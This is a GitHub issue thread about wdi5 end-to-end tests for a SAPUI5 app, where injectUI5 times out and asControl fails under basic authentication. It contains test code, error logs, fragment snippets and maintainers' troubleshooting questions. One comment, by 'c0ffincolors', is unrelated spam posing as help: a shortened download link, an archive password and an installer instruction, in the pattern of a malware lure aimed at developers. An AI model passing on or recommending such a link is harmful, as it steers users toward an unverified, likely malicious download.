### ISSUE TITLE
injectUI5 Timeout and asControl Failures with Basic Auth

### ISSUE THREAD

**Issue by calin10** [ui5-community/wdi5#638]
**Describe the bug**
When using wdio-ui5-service to inject UI5 and access controls in a SAPUI5 application, the injectUI5 function times out with the error: Error: waitUntil condition timed out after 10000ms. This issue follows a previous problem where the asControl() function intermittently failed with errors related to waitAsync and waitForUI5Options.

**To Reproduce**

1) Sapui5 project with typescript
2) Using wdi5 for e2e testing
3) In a test file sample.test.ts add this code :
```
import { before, describe, it } from "mocha";
import { default as _ui5Service, wdi5Selector } from "wdio-ui5-service";

const ui5Service = new _ui5Service();

describe("Main View Tests", async () => {
    const viewName = "com.view.Main";
    before(async () => {
        await ui5Service.injectUI5();
    });

    it("should enter '212' into the input field and trigger a backend call", async () => {
        const selector: wdi5Selector = {
            selector: {
                viewName: viewName,
                controlType: "sap.m.Input",
                id: "idArticleRefInput",
            },
        };
        const input = await browser.asControl(selector);
        await input.enterText(212);
        await browser.pause(1000);
    });
});
```

**Expected behavior**
The injectUI5 function should complete successfully, allowing the test to interact with the UI5 controls as expected.

**Logs/Console Output**
```
[0-0] 2024-08-27T15:22:32.632Z ERROR @wdio/utils:shim: Error: waitUntil condition timed out after 10000ms
[0-0]     at file:///path/to/node_modules/webdriverio/build/index.js:4350:13
[0-0]     at async Browser.wrapCommandFn (file:///path/to/node_modules/@wdio/utils/build/index.js:1368:23)
[0-0]     at async checkForUI5Page (file:///path/to/node_modules/wdio-ui5-service/src/lib/wdi5-bridge.ts:161:5)
[0-0]     at async Service.injectUI5 (file:///path/to/node_modules/wdio-ui5-service/src/service.ts:92:13)
[0-0]     at async Context.<anonymous> (file:///path/to/test/e2e/us/sample.test.ts:8:9)
```

**Screenshots**
![image](https://github.com/user-attachments/assets/43a16d76-d826-4717-8953-da6ec75f301c)

**Runtime Env (please complete the following information):**

wdi5/wdio-ui5-service-version: 2.0.10
UI5 version: 1.126.0
wdio-version (output of wdio --version): 8.40.3
node-version (output of node --version): v20.16.0
OS: MacOS Sonoma 14.6.1
Browser + Version: Chrome - Version 127.0.6533.120 (Official Build) (arm64)

**Additional context**
Initially, I encountered a similar issue to [this GitHub issue](https://github.com/ui5-community/wdi5/issues/601), where the asControl() function failed with errors related to waitAsync and waitForUI5Options. In my configuration, I also use basic authentication in wdio.conf and attempted to add the ignoreAutoWaitUrls property in the wdi5 object within wdio.conf.ts. Despite these changes, the problem persists. I am unsure what could be causing this issue.

@vobu, @Siolto, @dominikfeininger

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Siolto** [comment]
As this seem related to #601: Can you give us a little bit more context about your configuration especially the authentication? Which errors do you receive when you remove `ignoreAutoWaitUrls`?

**Comment by calin10** [comment]
Hi @Siolto, here is my wdio.conf.ts : 
[wdio.conf.txt](https://github.com/user-attachments/files/16767534/wdio.conf.txt)

**Comment by Siolto** [comment]
Is this a CAP application or could you also remove `BasicAuthUrls` and authenticate directly via the `baseURL`?

**Comment by calin10** [comment]
@Siolto @vobu, can you please support me with this one?

**Comment by vobu** [comment]
currently a little pressed on time, but will try to look into as soon as time permits.
If it's really urgent: j&s-soft offers [paid commercial support](https://ui5-community.github.io/wdi5/#/resources?id=commercial-support) for `wdi5` → this is where you'll get help immediately.

**Comment by Siolto** [comment]
I tried to reproduce your problem with our [CAP Application](https://github.com/SAP-samples/cap-bookshop-wdi5/tree/wdi5-tests) we use to test the BasicAuth. I could not enforce your issue. 

Can you provide a reproducible example for me, so that I can investigate this further?

**Comment by calin10** [comment]
@Siolto  I am trying to locate an input field that is inside a fragment. Here's the relevant code snippet from the fragment:
`<Input
	id="idArticleRefInput"
	textFormatMode="KeyValue"
	change="onArticleNumberInputChange"
	autocomplete="false"
	showValueHelp="true"
	value="{dataModel>/ArticleRef}"
	valueHelpRequest="onOpenVHDialog($event, 'ArticleDetails')"
	required="true"
/>
`
The fragment is loaded dynamically based on certain criteria. Below is the function I am using to load the fragment:
`public async loadFragmentByName<T extends Control>(
	fragmentName: string,
	options: FragmentOptions = {},
): Promise<T> {
	const { bindingPath, fragmentParent } = options;
	const fragmentControl = (await this.loadFragment({
		name: getFragmentName(fragmentName, fragmentParent),
		id: fragmentName,
		autoPrefixId: false,
	})) as T;

	return fragmentControl;
}
`
Once the fragment is loaded, I add it as a header to the object page layout:
`this.objectPageLayout.addHeaderContent(headerContent);
`

To automate the test, I am using the UI5 Journey Recorder. I recreated the steps I need to test, and the ID for my input is constructed as follows in the selector:
`const selector: wdi5Selector = {
	selector: {
		viewName: viewName,
		controlType: "sap.m.Input",
		id: "Filterbar_US--idArticleRefInput",
	},
};
`
However, when I run the test, I encounter the following error (please refer to the attached screenshot):
<img width="949" alt="image" src="https://github.com/user-attachments/assets/c14d5dbf-b80e-4f71-a7a2-8fa62b3352e4">

**Comment by Siolto** [comment]
This issue is not related to the original issue description, right? Is this another problem you are currently facing?

At first look everything looks good. Could you maybe check the fragment with the UI5 Inspector if for some reason the id is not matching.
